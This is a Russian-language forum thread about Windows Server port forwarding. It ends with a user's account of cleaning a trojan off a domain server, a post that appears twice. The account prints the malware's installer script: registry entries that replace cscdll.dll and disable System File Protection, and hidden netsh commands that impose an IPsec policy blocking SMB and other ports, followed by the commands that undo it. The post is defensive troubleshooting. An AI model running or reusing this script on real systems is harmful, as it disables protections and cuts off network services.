[DJ Electronic]

извне это значит из интернета, простите кстати не 80й а 90й порт, по команде netstat -an | findstr 8080 ничего не даёт, если запустить http file server и дать ему 8080 порт то выводит это:

C:\Users\SaranskCity>netstat -an | findstr 8080
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING

Ну оно и понятно
Для примера ввёл на сервере её же

C:\Documents and Settings\ADMIN>netstat -an | findstr 8080
TCP 87.119.243.144:4587 87.236.186.106:8080 ESTABLISHED
TCP 87.119.243.144:4647 92.125.227.124:8080 ESTABLISHED

[DJ Electronic]

я боюсь с mikrotik будут проблемы в плане поднятия точки доступа програмной определения блютуса и тд....вплоть до установки торрентов на него.



В общем бесполезно, сейчас игрался на сервере, RRAS отключил, врубил брандмауэер там добавил в исключение пару портов, перенастроил RRAS добавил в NAT порты, в своём компе в брандмауэре добавил программу в исключения всё ей разрешил и до кучи добавил порт в исключения, не видят люди меня из интернета как в прочем и любой другой сервер поднятый на сервере (как я уже писал выше), не говоря уж а пробросе портов, например веб (апачи), прокси, sql и тд....кроме тех что ставятся в ролях сервера, они как то открывают порты себе, например IIS....


Нашёл 2008, счас поставлю проверим, странно что то, думал x86 нет, видимо это касается R2 и R1

[Telepuzik]

Цитата DJ Electronic:

по команде netstat -an | findstr 8080 ничего не даёт, »

Если у вас по этой команде ничего не выдает, то как у вас тогда должно работать перенаправление портов если на машине на которую пересылаются запросы порт 8080 никто не слушает???

[Joni]

Цитата Vasosel:

Есть такая шикарная ОС, mikrotik »

Ну уж тогда linux поднять свой. микротик аналогичен просто уже полуготов к данным функциям. Зря только платить придется.

Цитата Telepuzik:

порт 8080 никто не слушает »

Человек наверное не ответит, ибо доволен 2008м

[DJ Electronic]

Странно но в 2008 такая же штука

[DJ Electronic]

Вобщем переместил програмку hfs на сервер, решил ей позадавать разные порты (в ней есть тест), 80й открыт 21 и 22 открыты 8000 8080 закрыты, почему так? Брандмауэр в 2008 работает вместе с RRAS, порты нужные открыл, хотя 80й например не открывал, а он светится

[Telepuzik]

Цитата DJ Electronic:

порты нужные открыл, »

Какой сервис у вас слушает открытые порты?

[DJ Electronic]

Всё разобрался, сейчас всё работает, с человеком в аське потестил - нормально и на самом сервере и через NAT, похоже веб сервисы по тестированию портов на предмет их открытости тупят.


P.S. Я ещё что то ступил пытался через 23 порт попасть на веб сервер))))

[Augur_shi]

Добрый день!
В продолжение темы, но как я предполагаю моя информация пригодится не только обладателям серверной ОС.

Дело было на прошлой неделе.
Сначала перестала работать FileZilla Client - при подключении к удалённому серверу проходит обработка имя в адрес сервера и дальше ожидаем подключения (т.е. слушает порт 23) а там тишина. Превышено время ожидания ответа.
Я обратился к хостингу, они ответили что всё нормально проверьте телнетом, проверяю - не работает, проверяю с соседнего компа - работает ( , хмм). Ну, думаю, ладно, пусть с этого по сети файлзиле поставлю ссылку на локальные файлы... ага не тут-то было, компьютера в сети не видно.
А это не просто компьютер это сервак АД, DHCP, DNS, Dr. Web сервер...
Вот было удивление когда работало всё, и др. веб обновлялся и в ДНС записи вносились, и динамические IP выдавались, сам на сервере сижу через RDP, но вот только сетевое окружение работало только на сервере через раз нормально, остальные ПК в сети не видели 90% времени ни домена ни политики обновить не могли (долго грузились утром при вкл.).
Стал вспоминать, а да точно было какое-то срабатывание на вирусы. Начал искать... в карантине др. вэба лежали trojan.packed2.42046 был найден в файле c:\windows\winupdate32.log
больше ничего, прошел kvrt, обнаружены: HEUR:Trojan.Script.Generic , not-a-virus:HEUR:AdWare.Script.Generic , not-a-virus:HEUR:AdWare.Win32.DealPly.gen и HEUR:Trojan.Win32.Generic (молодец), всё удалил перезагрузка с лечением.

Всё супер вирусов нет, но вот только проблемы остались (когда антивирусники будут возвращать в рабочее состояние изменённые вирусами файлы*****).

Стало понятно, что заблокированы порты. И при открытии файлов (заметил на архивах) стала вылезать надпись " cscdll.dll не найден ".

Дальше следовали 3 дня по поисковикам что да как пробовал разное что есть на форумах:
cscdll.dll нашёл на своём же ПК он был в C:\WINDOWS\ServicePackFiles\i386 и в C:\WINDOWS\system32\dllcache , но его не было в C:\WINDOWS\system32 тупо скопировал и перезагрузился, сообщение о ненайденом cscdll пропало.
Но что же с портами... подумал может троян таки какой-нибудь остался, часто встречал - один вирус приводит приятеля, а тот приводит своего... короче дискотека у них в моём компьютере.
Установил Malwarebytes Anti-Malware проверил, он мне вирусов насобирал и всё удалил, даже в реестре (молодец вообще).
Порты так и остались закрытыми. ОК, начал копать брандмауэр. В службах включил, а в настройках сделал сброс по умолчанию. Не помогло добавил правила для FTP на 21, 22 и 23 поты для TCP и UDP - результат 0.
Параллельно нашёл на сервере папке FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH видать последствия заражения.
Отключал\включал балансировку нагрузки сети, в настройках TCP включал NetBIOS помогало на минуты - компьютеры стали видеть сеть, но не сервак. На сервер нельзя было зайти из сети и шары его соответственно.
Полазил в маршрутизации и удалённом доступе - перестал запускаться брандмауэр, отключил маршрутизацию и удалённый доступ (в оснастке) - брандмауэр заработал, но не помогло.
Заметил в свойствах подключения имеется протокол TCP версия 6, удалил, перезагрузился - не помогло, установил обратно протокол.
Пробовал даже kidokiller - неа...
Пытался узнать что делает найденный троян HEUR:AdWare.Win32.DealPly.gen - нигде ничего.
Поставил PortScan там видно что порты открытые есть, но блин.... ну точно же порты не открытые, telnet показывает что 21 порт закрыт... чем не понятно, ну точно не брандмауэр....
Пробовал удалять сетевое подключение - неа.
Пробовал чинить винсокс программой winsockfix - неа, не оно.
Сегодня подумал надо поискать время заражения и посмотреть что осталось от вирусов. Время нашёл, а вот что осталось от вирусов найти... (молодцы антивирусники - хорошо жахнули).
Сделал поиск и увидел что папка C:\Program Files\FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH была создана 25 ноября в 11:14, после поиска на диске С всего по дате и упорядочивание по времени дали результат:
нашёл файл MSI246.tmp Открыл его блокнотом и вуаля - всё что делал вирус написано почти членораздельно, ну по крайней мере прочитать можно, что и как изменял вирус в системе.

Содержимое файла MSI246.tmp
 @IXOS @-
@НYyO @ @ @
@ @ @
& {80395032-1630-4C4B-A997-0A7CCB72C75B}$ FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH SMB2.jpg @ @  @
@ Ђ Ђ& {54900365-375C-422E-B1C5-97195DCA50E3} Ђ Ђ @ @ @  @ @ @Ё  @
$ FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH Ђ RollbackАck(WЮVЪnНd\O: Ђ RollbackCleanupАck(W Rd–YэN‡eцN. . . А‡eцN: [ 1 ] „
@ „
@
 ProcessComponentsАck(Wфf°eД~цNиlЊQh€. . .  @
@
@А] & {AA00B7B4-1374-462E-A7CA-5140E25A78C3} C:\WINDOWS\AppPatch\Custom\ @ Ђ @
@ @ 
CreateFolders
Аck(WRъ^‡eцN9Y. . . А‡eцN9Y: [ 1 ] "[ C:\Program Files\FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH\FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH\ @ " C:\WINDOWS\AppPatch\Custom\ @  InstallFiles
Аck(W
Y6R°e‡eцN. . . А‡eцN: [ 1 ]
0 оvU_: [ 9 ]
0 'Y\: [ 6 ]  @± @ @

 C:\WINDOWS\
 1\WINDOW~1\|WindowsFolder\ ЂАч‹ТceQБxШv: disk1.cab @ Ђ @  C:\WINDOWS\Installer\MSI241.tmp Ђ Ђ Ђ Ђ @
 SYSUPD~1.LOG|sysupdate.log
sysupdate.log
sysupdate.log @ @Пя @ Ђ Ђ @
Ђ Ђ Ђ Ђ @ Ђ Ђ @ „ WINUPD~1.LOG|winupdate32.log winupdate32.log winupdate32.log @ @O* @ Ђ Ђ @
Ђ Ђ Ђ Ђ @ Ђ Ђ @ „‡ j
@  WriteRegistryValues
Аck(W™QeQы|Я~иlЊQh€<P. . . А.•<P: [ 1 ] я
Tрy: [ 2 ] я<P: [ 3 ]  @ @
@ђ3 $ @ Ђ0 SYSTEM\CurrentControlSet\Control\Session Manager Ђ @ % AllowProtectedRenames #1% PendingFileRenameOperations=
\??\C:\WINDOWS\AppPatch\Acpcscdll.dll \??\C:\WINDOWS\system32\cscdll.dll \??\C:\WINDOWS\AppPatch\Acpcscdll.dll \??\C:\WINDOWS\system32\cscdll.dll \??\C:\WINDOWS\winupdate32.log \??\C:\WINDOWS\system32\cscdll.dll \??\C:\WINDOWS\AppPatch\Ke583427.xsl \??\C:\WINDOWS\sysupdate.log \??\C:\WINDOWS\AppPatch\Ke583427.xsl$ @ Ђ5 SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Ђ @ %
SFCDisable #4% SFCScan #0$ @ Ђ SOFTWARE\SoundResearch Ђ @
% UpdaterLastTimeChecked1 #1 ExecuteScriptCode Ђ ЂJ ExecuteScriptCode @f Ќ
On Error Resume Next
Set vbs=CreateObject("Wscript.Shell")
vbs.Run "netsh interface ipv6 install",0,True
vbs.Run "netsh ipsec static add policy name=qianye",0,True
vbs.Run "netsh ipsec static add filterlist name=Filter1",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=21 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=7777 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8443 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8888 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9000 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9999 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14443 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14444 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filteraction name=FilteraAtion1 action=block",0,True
vbs.Run "netsh ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion1",0,True
vbs.Run "netsh ipsec static set policy name=qianye assign=y",0,True @ @ @®qІ


Эта гадость подменила через реестр системные файлы, установила ТСР в. 6, и добавила правило с блокировкой портов.
Короче лечится так:

1. в командной строке вводим
netsh interface ipv6 uninstall

либо просто удалить протокол в настройках подключения

2. перезагрузка

3. в командной строке вводим
netsh ipsec static delete all



P.S. неделя выноса мозга, а всего две команды надо.

Добрый день!
В продолжение темы, но как я предполагаю моя информация пригодится не только обладателям серверной ОС.

Дело было на прошлой неделе.
Сначала перестала работать FileZilla Client - при подключении к удалённому серверу проходит обработка имя в адрес сервера и дальше ожидаем подключения (т.е. слушает порт 23) а там тишина. Превышено время ожидания ответа.
Я обратился к хостингу, они ответили что всё нормально проверьте телнетом, проверяю - не работает, проверяю с соседнего компа - работает ( , хмм). Ну, думаю, ладно, пусть с этого по сети файлзиле поставлю ссылку на локальные файлы... ага не тут-то было, компьютера в сети не видно.
А это не просто компьютер это сервак АД, DHCP, DNS, Dr. Web сервер...
Вот было удивление когда работало всё, и др. веб обновлялся и в ДНС записи вносились, и динамические IP выдавались, сам на сервере сижу через RDP, но вот только сетевое окружение работало только на сервере через раз нормально, остальные ПК в сети не видели 90% времени ни домена ни политики обновить не могли (долго грузились утром при вкл.).
Стал вспоминать, а да точно было какое-то срабатывание на вирусы. Начал искать... в карантине др. вэба лежали trojan.packed2.42046 был найден в файле c:\windows\winupdate32.log
больше ничего, прошел kvrt, обнаружены: HEUR:Trojan.Script.Generic , not-a-virus:HEUR:AdWare.Script.Generic , not-a-virus:HEUR:AdWare.Win32.DealPly.gen и HEUR:Trojan.Win32.Generic (молодец), всё удалил перезагрузка с лечением.

Всё супер вирусов нет, но вот только проблемы остались (когда антивирусники будут возвращать в рабочее состояние изменённые вирусами файлы*****).

Стало понятно, что заблокированы порты. И при открытии файлов (заметил на архивах) стала вылезать надпись " cscdll.dll не найден ".

Дальше следовали 3 дня по поисковикам что да как пробовал разное что есть на форумах:
cscdll.dll нашёл на своём же ПК он был в C:\WINDOWS\ServicePackFiles\i386 и в C:\WINDOWS\system32\dllcache , но его не было в C:\WINDOWS\system32 тупо скопировал и перезагрузился, сообщение о ненайденом cscdll пропало.
Но что же с портами... подумал может троян таки какой-нибудь остался, часто встречал - один вирус приводит приятеля, а тот приводит своего... короче дискотека у них в моём компьютере.
Установил Malwarebytes Anti-Malware проверил, он мне вирусов насобирал и всё удалил, даже в реестре (молодец вообще).
Порты так и остались закрытыми. ОК, начал копать брандмауэр. В службах включил, а в настройках сделал сброс по умолчанию. Не помогло добавил правила для FTP на 21, 22 и 23 поты для TCP и UDP - результат 0.
Параллельно нашёл на сервере папке FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH видать последствия заражения.
Отключал\включал балансировку нагрузки сети, в настройках TCP включал NetBIOS помогало на минуты - компьютеры стали видеть сеть, но не сервак. На сервер нельзя было зайти из сети и шары его соответственно.
Полазил в маршрутизации и удалённом доступе - перестал запускаться брандмауэр, отключил маршрутизацию и удалённый доступ (в оснастке) - брандмауэр заработал, но не помогло.
Заметил в свойствах подключения имеется протокол TCP версия 6, удалил, перезагрузился - не помогло, установил обратно протокол.
Пробовал даже kidokiller - неа...
Пытался узнать что делает найденный троян HEUR:AdWare.Win32.DealPly.gen - нигде ничего.
Поставил PortScan там видно что порты открытые есть, но блин.... ну точно же порты не открытые, telnet показывает что 21 порт закрыт... чем не понятно, ну точно не брандмауэр....
Пробовал удалять сетевое подключение - неа.
Пробовал чинить винсокс программой winsockfix - неа, не оно.
Сегодня подумал надо поискать время заражения и посмотреть что осталось от вирусов. Время нашёл, а вот что осталось от вирусов найти... (молодцы антивирусники - хорошо жахнули).
Сделал поиск и увидел что папка C:\Program Files\FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH была создана 25 ноября в 11:14, после поиска на диске С всего по дате и упорядочивание по времени дали результат:
нашёл файл MSI246.tmp Открыл его блокнотом и вуаля - всё что делал вирус написано почти членораздельно, ну по крайней мере прочитать можно, что и как изменял вирус в системе.

Содержимое файла MSI246.tmp
 @IXOS @-
@НYyO @ @ @
@ @ @
& {80395032-1630-4C4B-A997-0A7CCB72C75B}$ FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH SMB2.jpg @ @  @
@ Ђ Ђ& {54900365-375C-422E-B1C5-97195DCA50E3} Ђ Ђ @ @ @  @ @ @Ё  @
$ FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH Ђ RollbackАck(WЮVЪnНd\O: Ђ RollbackCleanupАck(W Rd–YэN‡eцN. . . А‡eцN: [ 1 ] „
@ „
@
 ProcessComponentsАck(Wфf°eД~цNиlЊQh€. . .  @
@
@А] & {AA00B7B4-1374-462E-A7CA-5140E25A78C3} C:\WINDOWS\AppPatch\Custom\ @ Ђ @
@ @ 
CreateFolders
Аck(WRъ^‡eцN9Y. . . А‡eцN9Y: [ 1 ] "[ C:\Program Files\FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH\FONDQXIMSYHLISNDBCFPGGQDFFXNKBARIRJH\ @ " C:\WINDOWS\AppPatch\Custom\ @  InstallFiles
Аck(W
Y6R°e‡eцN. . . А‡eцN: [ 1 ]
0 оvU_: [ 9 ]
0 'Y\: [ 6 ]  @± @ @

 C:\WINDOWS\
 1\WINDOW~1\|WindowsFolder\ ЂАч‹ТceQБxШv: disk1.cab @ Ђ @  C:\WINDOWS\Installer\MSI241.tmp Ђ Ђ Ђ Ђ @
 SYSUPD~1.LOG|sysupdate.log
sysupdate.log
sysupdate.log @ @Пя @ Ђ Ђ @
Ђ Ђ Ђ Ђ @ Ђ Ђ @ „ WINUPD~1.LOG|winupdate32.log winupdate32.log winupdate32.log @ @O* @ Ђ Ђ @
Ђ Ђ Ђ Ђ @ Ђ Ђ @ „‡ j
@  WriteRegistryValues
Аck(W™QeQы|Я~иlЊQh€<P. . . А.•<P: [ 1 ] я
Tрy: [ 2 ] я<P: [ 3 ]  @ @
@ђ3 $ @ Ђ0 SYSTEM\CurrentControlSet\Control\Session Manager Ђ @ % AllowProtectedRenames #1% PendingFileRenameOperations=
\??\C:\WINDOWS\AppPatch\Acpcscdll.dll \??\C:\WINDOWS\system32\cscdll.dll \??\C:\WINDOWS\AppPatch\Acpcscdll.dll \??\C:\WINDOWS\system32\cscdll.dll \??\C:\WINDOWS\winupdate32.log \??\C:\WINDOWS\system32\cscdll.dll \??\C:\WINDOWS\AppPatch\Ke583427.xsl \??\C:\WINDOWS\sysupdate.log \??\C:\WINDOWS\AppPatch\Ke583427.xsl$ @ Ђ5 SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Ђ @ %
SFCDisable #4% SFCScan #0$ @ Ђ SOFTWARE\SoundResearch Ђ @
% UpdaterLastTimeChecked1 #1 ExecuteScriptCode Ђ ЂJ ExecuteScriptCode @f Ќ
On Error Resume Next
Set vbs=CreateObject("Wscript.Shell")
vbs.Run "netsh interface ipv6 install",0,True
vbs.Run "netsh ipsec static add policy name=qianye",0,True
vbs.Run "netsh ipsec static add filterlist name=Filter1",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=21 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=7777 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8443 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8888 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9000 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9999 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14443 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14444 protocol=TCP",0,True
vbs.Run "netsh ipsec static add filteraction name=FilteraAtion1 action=block",0,True
vbs.Run "netsh ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion1",0,True
vbs.Run "netsh ipsec static set policy name=qianye assign=y",0,True @ @ @®qІ


Эта гадость подменила через реестр системные файлы, установила ТСР в. 6, и добавила правило с блокировкой портов.
Короче лечится так:

1. в командной строке вводим
netsh interface ipv6 uninstall

либо просто удалить протокол в настройках подключения

2. перезагрузка

3. в командной строке вводим
netsh ipsec static delete all



P.S. неделя выноса мозга, а всего две команды надо.